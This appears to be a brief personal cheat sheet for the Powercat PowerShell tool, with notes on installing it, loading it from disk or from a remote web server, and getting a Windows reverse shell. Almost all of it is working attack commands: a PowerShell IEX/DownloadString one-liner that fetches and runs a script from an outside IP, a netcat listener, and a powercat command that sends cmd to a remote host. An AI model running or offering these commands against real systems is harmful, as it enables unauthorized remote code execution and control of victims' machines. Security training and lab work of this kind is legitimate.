Skip to content

Powercat

Install


with apm

sudo apt install powercat 
#-> /ush/share/windows-resources/powercat
from GitHub
git clone https://github.com/besimorhino/powercat.git /opt/windows/

Reverse shell


load powercat from file (option 1)

. .\powercat.ps1
load powercat from remove serve (option 2)
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.18.9.175:8000/powercat.ps1');"
show helpe
powercat -h
run reverse shell linux machine
sudo nc -lvp 443
windows machine
powercat -c 10.18.9.175 -p 443 -e cmd